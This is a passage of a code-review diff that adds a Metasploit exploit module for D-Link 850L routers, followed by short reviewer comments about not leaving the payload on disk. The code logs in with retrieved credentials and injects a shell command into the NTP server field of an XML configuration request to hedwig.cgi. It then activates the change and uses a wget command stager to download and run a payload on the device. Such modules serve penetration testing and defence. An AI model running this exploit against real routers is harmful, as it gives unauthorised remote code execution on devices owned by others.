modules/exploits/linux/http/dlink_850l_unauth_exec.rb

```diff
@@ -0,0 +1,170 @@
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+  def hash_passwd(username, password, challenge)
+    hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
+    return hash
+  end
+
+  def login(username, hash, uid)
+    begin
+      data = "id=#{username}&password=#{hash}"
+      res = send_request_cgi({
+        'uri' => '/authentication.cgi',
+        'method' => 'POST',
+        'data' => data,
+        'cookie' => "uid=#{uid}"
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+  def execute_command(cmd, opts)
+    username, password = retrieve_creds
+    uid, challenge = retrieve_uid
+    hash = hash_passwd(username, password, challenge)
+    login(username, hash, uid)
+    payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
+    payload << "<postxml>\r\n"
+    payload << "<module>\r\n"
+    payload << "        <service>DEVICE.TIME</service>\r\n"
+    payload << "        <device>\r\n"
+    payload << "                <time>\r\n"
+    payload << "                        <ntp>\r\n"
+    payload << "                                <enable>1</enable>\r\n"
+    payload << "                                <period>604800</period>\r\n"
+    payload << "                                <server>metelesku; (#{cmd};) &amp; exit; </server>\r\n"
+    payload << "                        </ntp>\r\n"
+    payload << "                        <ntp6>\r\n"
+    payload << "                                <enable>1</enable>\r\n"
+    payload << "                                <period>604800</period>\r\n"
+    payload << "                        </ntp6>\r\n"
+    payload << "                        <timezone>20</timezone>\r\n"
+    payload << "                        <time/>\r\n"
+    payload << "                        <date/>\r\n"
+    payload << "                        <dst>0</dst>\r\n"
+    payload << "                        <dstmanual/>\r\n"
+    payload << "                        <dstoffset/>\r\n"
+    payload << "                </time>\r\n"
+    payload << "        </device>\r\n"
+    payload << "</module>\r\n"
+    payload << "</postxml>"
+    begin
+      res = send_request_cgi({
+        'uri' => '/hedwig.cgi',
+        'method' => 'POST',
+        'ctype' => 'text/xml',
+        'data' => payload,
+        'cookie' => "uid=#{uid}"
+        })
+      res = send_request_cgi({
+        'uri' => '/pigwidgeon.cgi',
+        'method' => 'POST',
+        'data' => 'ACTIONS=SETCFG,ACTIVATE',
+        'cookie' => "uid=#{uid}"
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+
+  def exploit
+    print_status("#{peer} - Initiating exploitation...")
+    execute_cmdstager(
+      :flavor => :wget,
+      :background => true,
+      :nodelete => true
```

Comment:
any reason the payload has to stay on disk?

Reply:
nope, just had it there for testing so I could see the thing when testing xd. will remove

Reply:
'scuse english